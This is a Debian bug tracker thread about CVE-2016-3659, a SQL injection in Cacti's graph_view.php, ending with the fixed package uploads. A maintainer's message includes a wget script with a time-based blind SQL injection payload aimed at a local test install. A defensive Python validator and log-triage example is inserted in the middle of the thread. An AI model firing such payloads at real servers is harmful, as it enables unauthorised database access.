cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Related Vulnerabilities: CVE-2016-3659   CVE-2016-3172   CVE-2016-2313  

Debian Bug report logs - #820521


Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sat, 9 Apr 2016 12:00:01 UTC

Severity: important

Tags: fixed-upstream, help, security, upstream

Found in version cacti/0.8.8g+ds1-1

Fixed in versions cacti/0.8.8h+ds1-1, cacti/0.8.8b+dfsg-8+deb8u5

Done: Paul Gevers <elbrus@debian.org>

Bug is archived. No further changes may be made.

Forwarded to http://bugs.cacti.net/view.php?id=2673



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>:
Bug#820521; Package src:cacti. (Sat, 09 Apr 2016 12:00:05 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Sat, 09 Apr 2016 12:00:05 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php
Date: Sat, 09 Apr 2016 13:56:52 +0200
Source: cacti
Version: 0.8.8g+ds1-1
Severity: important
Tags: security upstream
Forwarded: http://bugs.cacti.net/view.php?id=2673

Hi,

the following vulnerability was published for cacti. AFAICT, there
is not yet an upstream patch for this issue.

CVE-2016-3659[0]:
Cacti graph_view.php SQL Injection Vulnerability

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-3659
[1] http://bugs.cacti.net/view.php?id=2673
[2] http://seclists.org/fulldisclosure/2016/Apr/4

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Information forwarded to debian-bugs-dist@lists.debian.org, Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>:
Bug#820521; Package src:cacti. (Fri, 29 Apr 2016 04:39:08 GMT) (full text, mbox, link).


Acknowledgement sent to Paul Gevers <elbrus@debian.org>:
Extra info received and forwarded to list. Copy sent to Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>. (Fri, 29 Apr 2016 04:39:08 GMT) (full text, mbox, link).


Message #10 received at 820521@bugs.debian.org (full text, mbox, reply):

From: Paul Gevers <elbrus@debian.org>
To: 820521@bugs.debian.org
Subject: Re: cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php
Date: Fri, 29 Apr 2016 06:33:48 +0200
[Message part 1 (text/plain, inline)]
Control: tags -1 help

For the record of this bug.

I have not been able to reproduce this on my Debian system, and upstream
hasn't responded yet to the bug report. Any help in reproducing it and
providing a script to reproduce it is welcome. The script from the
upstream bug report does not reproduce the issue for me.

One data point: I have verified that the code we try to inject is valid
MySQL code in the Debian (sid) version and as such should delay if one
is able to trigger the vulnerability.

Paul

-------- Forwarded Message --------
Subject: reproducing vulnerability
Date: Sun, 10 Apr 2016 13:47:54 +0200
From: Paul Gevers <elbrus@debian.org>
To: Debian Security <security@debian.org>

Hi,

Call me dumb or ignorant, but even with multiple tries over the last
couple of days, I have not been able to reproduce a CVE¹ against my
package cacti. I have tried using wget with the code below and also in
my browser (iceweasel with "Web Developer" plugin) by changing "hidden"
fields to trigger the issue, without success. Am I doing this wrong? Do
you have tips or tricks on how to test these kinds of security issues?

(Obviously, I am not doubting the CVE itself, although it may be so that
Debian is not vulnerable. I would be surprised though.)

#### Initializing stuff
database_pw=theAdminPasswordHere
tmpFile1=$(mktemp)
tmpFile2=$(mktemp)
cookieFile=$(mktemp)
loadSaveCookie="--load-cookies $cookieFile --keep-session-cookies --save-cookies $cookieFile"

# Make sure we get the magic, this is stored in the cookies for future use.
wget --keep-session-cookies --save-cookies "$cookieFile" \
  --output-document="$tmpFile1" http://localhost/cacti/index.php
magic=$(grep "name='__csrf_magic' value=" "$tmpFile1" \
  | sed "s/.*__csrf_magic' value=\"//" | sed "s/\" \/>//")
postData="action=login&login_username=admin&login_password=${database_pw}&__csrf_magic=${magic}"
wget $loadSaveCookie --post-data="$postData" \
  --output-document="$tmpFile2" http://localhost/cacti/index.php

#### and then the real tries here:
# CVE-2016-3659 Unfortunately, I am not able to trigger the issue
wget $loadSaveCookie --timeout=10 --tries=1 \
  "http://localhost/cacti/graph_view.php?action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1 union select case when ord(substring((select version()) from 1 for 1)) between 53 and 53 then sleep(100) else 0 end"

wget $loadSaveCookie --timeout=10 --tries=1 \
  --post-data="__csrf_magic=${magic}&action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1%20union%20select%20case%20when%20ord(substring((select%20version())%20from%201%20for%201))%20between%2053%20and%2053%20then%20sleep(100)%20else%200%20end" \
  "http://localhost/cacti/graph_view.php"

Paul

¹ https://security-tracker.debian.org/tracker/CVE-2016-3659





[signature.asc (application/pgp-signature, attachment)]
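The message above turns on whether the `host_group_data` selector (`graph_template:1` in the normal case) can carry trailing SQL into the query behind graph_view.php. The Python below is an added example, written for this page and not taken from Cacti or from the thread, showing the defensive pattern for such a `type:id` parameter: parse it against a strict anchored grammar, check the type against an allowlist, cast the id to an integer and bind it as a query parameter, so the SQL text never depends on request data. The allowlist, the column map, the `graph_local` table and the access-log lines are all constructed for the demo; the real Cacti schema and selector types may differ. The second half reuses the same grammar for log triage, flagging requests whose selector does not parse, which is the simplest detection for the shape of input Paul describes.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of selector types; hypothetical, the real Cacti set may differ.
ALLOWED_TYPES = {"graph_template", "host_template", "data_query"}

# Strict grammar: one lowercase identifier, a colon, one unsigned integer.
# Anchored at both ends (\A ... \Z) so a trailing space or keyword cannot ride along.
_SELECTOR_RE = re.compile(r"\A([a-z_]+):(\d{1,10})\Z")

# Which column each type filters on. A constant table, never taken from the request.
_COLUMN_FOR_TYPE = {
    "graph_template": "graph_template_id",
    "host_template": "host_template_id",
    "data_query": "data_query_id",
}


def parse_host_group_data(value):
    """Return (type, id) for a well-formed selector; raise ValueError otherwise."""
    match = _SELECTOR_RE.match(value)
    if match is None:
        raise ValueError("malformed selector: %r" % value)
    kind, raw_id = match.groups()
    if kind not in ALLOWED_TYPES:
        raise ValueError("unknown selector type: %r" % kind)
    return kind, int(raw_id)


def is_well_formed(value):
    """Boolean wrapper around parse_host_group_data, handy for log triage."""
    try:
        parse_host_group_data(value)
        return True
    except ValueError:
        return False


def graph_ids_for_selector(conn, value):
    """Look up graph ids with the id bound as a parameter, not spliced into the SQL."""
    kind, ident = parse_host_group_data(value)
    column = _COLUMN_FOR_TYPE[kind]  # from our own constant map, so safe to interpolate
    sql = "SELECT id FROM graph_local WHERE %s = ? ORDER BY id" % column
    return [row[0] for row in conn.execute(sql, (ident,))]


def build_demo_db():
    """Tiny in-memory stand-in for the graph table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE graph_local (id INTEGER, graph_template_id INTEGER,"
        " host_template_id INTEGER, data_query_id INTEGER)"
    )
    conn.executemany(
        "INSERT INTO graph_local VALUES (?, ?, ?, ?)",
        [(1, 1, 0, 0), (2, 1, 0, 0), (3, 2, 0, 0), (4, 0, 5, 0)],
    )
    conn.commit()
    return conn


# Constructed access-log lines (common log format) for the triage demo.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Apr/2016:06:33:48 +0200] "GET /cacti/graph_view.php?action=tree&tree_id=1&host_group_data=graph_template:1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [29/Apr/2016:06:34:02 +0200] "GET /cacti/graph_view.php?action=tree&tree_id=1&host_group_data=graph_template:1%20union%20select%201 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [29/Apr/2016:06:35:10 +0200] "GET /cacti/graph_view.php?action=tree&tree_id=2&host_group_data=data_query:3 HTTP/1.1" 200 4870',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_malformed_selectors(log_lines):
    """Return (line_number, decoded value) for requests whose selector fails the grammar."""
    flagged = []
    for number, line in enumerate(log_lines, start=1):
        match = _REQUEST_RE.search(line)
        if match is None:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)  # percent-decodes the values
        for value in query.get("host_group_data", []):
            if not is_well_formed(value):
                flagged.append((number, value))
    return flagged


if __name__ == "__main__":
    conn = build_demo_db()
    print(graph_ids_for_selector(conn, "graph_template:1"))
    for number, value in flag_malformed_selectors(SAMPLE_LOG):
        print("line %d: rejected selector %r" % (number, value))
```

The grammar does the real work: because the regular expression is anchored with `\A` and `\Z` and the id group admits only digits, anything appended after the integer fails to parse before any SQL is built, and the only request-derived value that reaches the database goes through a bound parameter. The log triage applies the same rule to POST bodies only if they are logged; for the GET form shown in the thread the query string is enough.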

Added tag(s) help. Request was from Paul Gevers <elbrus@debian.org> to 820521-submit@bugs.debian.org. (Fri, 29 Apr 2016 04:39:08 GMT) (full text, mbox, link).


Added tag(s) fixed-upstream. Request was from bts-link-upstream@lists.alioth.debian.org to control@bugs.debian.org. (Mon, 09 May 2016 17:33:07 GMT) (full text, mbox, link).


Reply sent to Paul Gevers <elbrus@debian.org>:
You have taken responsibility. (Mon, 16 May 2016 19:24:09 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Mon, 16 May 2016 19:24:10 GMT) (full text, mbox, link).


Message #19 received at 820521-close@bugs.debian.org (full text, mbox, reply):

From: Paul Gevers <elbrus@debian.org>
To: 820521-close@bugs.debian.org
Subject: Bug#820521: fixed in cacti 0.8.8h+ds1-1
Date: Mon, 16 May 2016 19:22:29 +0000
Source: cacti
Source-Version: 0.8.8h+ds1-1

We believe that the bug you reported is fixed in the latest version of
cacti, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 820521@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Paul Gevers <elbrus@debian.org> (supplier of updated cacti package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 14 May 2016 22:26:35 +0200
Source: cacti
Binary: cacti
Architecture: source
Version: 0.8.8h+ds1-1
Distribution: unstable
Urgency: medium
Maintainer: Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
Changed-By: Paul Gevers <elbrus@debian.org>
Description:
 cacti      - web interface for graphing of monitoring systems
Closes: 820521
Changes:
 cacti (0.8.8h+ds1-1) unstable; urgency=medium
 .
   * New upstream release
     - CVE-2016-3659 SQL Injection Vulnerability in graph_view.php (Closes:
       #820521)
   * Drop obsolete patches (applied upstream)
   * Update tests to depend on javascript-common
   * Don't test lighttpd for now
   * Drop jquery.js from the source (wasn't used anyways in Debian), so no
     need to document it in d/copyright
   * Add make_cacti_sql_mode-strict_compatible.patch to enable cacti to
     work with the default settings of MySQL 5.7 (LP: #1578144)
Checksums-Sha1:
 0e74c81425313ef829c7cd869d775196bf8c6a06 1571 cacti_0.8.8h+ds1-1.dsc
 d999403cd29250f956e8db95952eb6dc5f8be9a8 2154671 cacti_0.8.8h+ds1.orig.tar.gz
 463e88bfa5e2cc607e72dea144b4490396ad4d2d 47544 cacti_0.8.8h+ds1-1.debian.tar.xz
Checksums-Sha256:
 efb553707b2a8e8b69f4f39662557ff634c8701995d58cee79da75821871fefa 1571 cacti_0.8.8h+ds1-1.dsc
 75f9e455b6bbd16c14ef1fb92426900f86e067512eb0d64b87b7eb97bbe78efc 2154671 cacti_0.8.8h+ds1.orig.tar.gz
 0eb9f3ecfb2106254e067ac7f84d2d19491dae60749919fa75427e66c07d52cc 47544 cacti_0.8.8h+ds1-1.debian.tar.xz
Files:
 31b2e92accc2fc446af5bca2a168dbdc 1571 web extra cacti_0.8.8h+ds1-1.dsc
 8ff7049c7a1b4984d0bb35f079c9c671 2154671 web extra cacti_0.8.8h+ds1.orig.tar.gz
 28e5afd22d959e71a7f2290f24868c91 47544 web extra cacti_0.8.8h+ds1-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCAAGBQJXOgqiAAoJEJxcmesFvXUKwOIH/2mfInVQ1XDL/RvtNzIl6e69
kI0K5hfav++p8FQco3eZ82gbFNSjMltObwt6ESb7Ra6JWuqT6/DG0Nus644ohpDs
fee3a/SmikNN7LH3ttAyJjezCdCFVNbEEsa2z5bYzKKoKYy+RtC+Dd5nS0mhKQlt
Is+oXvrkiXEVrcqkHck65yM1FO75sXEwAuuN4kJnhgF618WfmPaAuPCGp5SftbW2
KcZd+7uWFj+t0/hnjM4Xdmm4nUyuNwofwCSJc8+KTTPfSRrE8Tbn7B8b8aXU/cc3
nmZ0tpmS+GxYsqsGV59bNjeHapbTjQPcBRHr72Vc5uMObloeApQErpXno9O/vdk=
=pacD
-----END PGP SIGNATURE-----




Reply sent to Paul Gevers <elbrus@debian.org>:
You have taken responsibility. (Sat, 16 Jul 2016 22:06:18 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Sat, 16 Jul 2016 22:06:18 GMT) (full text, mbox, link).


Message #24 received at 820521-close@bugs.debian.org (full text, mbox, reply):

From: Paul Gevers <elbrus@debian.org>
To: 820521-close@bugs.debian.org
Subject: Bug#820521: fixed in cacti 0.8.8b+dfsg-8+deb8u5
Date: Sat, 16 Jul 2016 22:02:41 +0000
Source: cacti
Source-Version: 0.8.8b+dfsg-8+deb8u5

We believe that the bug you reported is fixed in the latest version of
cacti, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 820521@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Paul Gevers <elbrus@debian.org> (supplier of updated cacti package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 09 Jul 2016 20:05:41 +0200
Source: cacti
Binary: cacti
Architecture: source all
Version: 0.8.8b+dfsg-8+deb8u5
Distribution: jessie-proposed-updates
Urgency: medium
Maintainer: Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
Changed-By: Paul Gevers <elbrus@debian.org>
Description:
 cacti      - web interface for graphing of monitoring systems
Closes: 814353 818647 820521
Changes:
 cacti (0.8.8b+dfsg-8+deb8u5) jessie-proposed-updates; urgency=medium
 .
   [ Emilio Pozuelo Monfort ]
   * debian/patches/CVE-2016-3172-sql-injection.patch:
     + CVE-2016-3172: Fix sql injection in tree.php (Closes: #818647)
   * debian/patches/CVE-2016-3659-sql-injection.patch:
     + CVE-2016-3659: Fix sql injection in graph_view.php (Closes: #820521)
   * debian/patches/CVE-2016-2313-authentication-bypass.patch:
     + CVE-2016-2313: Fix authentication bypass (Closes: #814353)
Checksums-Sha1:
 985cce7d8476be171f43f007e38b2d99fbf35336 1666 cacti_0.8.8b+dfsg-8+deb8u5.dsc
 7f8f9d7376431890775fb028d05cbe501897b700 116024 cacti_0.8.8b+dfsg-8+deb8u5.debian.tar.xz
 1fc6c14eb4b6700f243a3ce668d04c13d69816e6 1894154 cacti_0.8.8b+dfsg-8+deb8u5_all.deb
Checksums-Sha256:
 be49709c9c464f9042a4d32cb2a4307852d67ab93147f8c8c08ef9ac3bce6d35 1666 cacti_0.8.8b+dfsg-8+deb8u5.dsc
 888a0f8526de8f85f9b515017399fa12971362a58e5d5e0fd51725b69c3d1954 116024 cacti_0.8.8b+dfsg-8+deb8u5.debian.tar.xz
 04903ef10a9b6c5ad3bbf5424ee6a9d522705f93315da521a4263cea3d8e6fb3 1894154 cacti_0.8.8b+dfsg-8+deb8u5_all.deb
Files:
 1afd440ede4ccd9405b25bcdcbd521c3 1666 web extra cacti_0.8.8b+dfsg-8+deb8u5.dsc
 b32c421a920578ec4ca6f27e99950b9b 116024 web extra cacti_0.8.8b+dfsg-8+deb8u5.debian.tar.xz
 8a35d0e97846b58b0398f8abf5ce8794 1894154 web extra cacti_0.8.8b+dfsg-8+deb8u5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCAAGBQJXiNOqAAoJEJxcmesFvXUKudIH/19i/+6yquq2E5FIKqQ+v3TM
EkvGkO50rbdYQYoKN5cEEQjV8u2U2/j5I7X5VGBYo4OOC04jQxpS+I5OBvqFmjTU
VY8DEnZ0o1bBXWq1clDIhaEzmIGUs3z5g9XaREwOaNgxI5H5saXXaBdfohQ2e5jU
tgymwLi0irLODMx8qvwuOLRuyja3h44Y+foKulSw5xrN+2s0XrLakggTM9KLqme8
ivwGENER9sSDLIe+Hx/Or+0MqmpFNYipXb6FxdT/znoCfVALApAvvTYcvxE2w6oe
GISnjShk59WH4UFh+THi8dGay1Oujdl1+sSd6nqLBxPqvNYTFAk8QJb7cMOlMLI=
=R6gn
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 14 Aug 2016 07:33:17 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:28:57 2019; Machine Name: beach
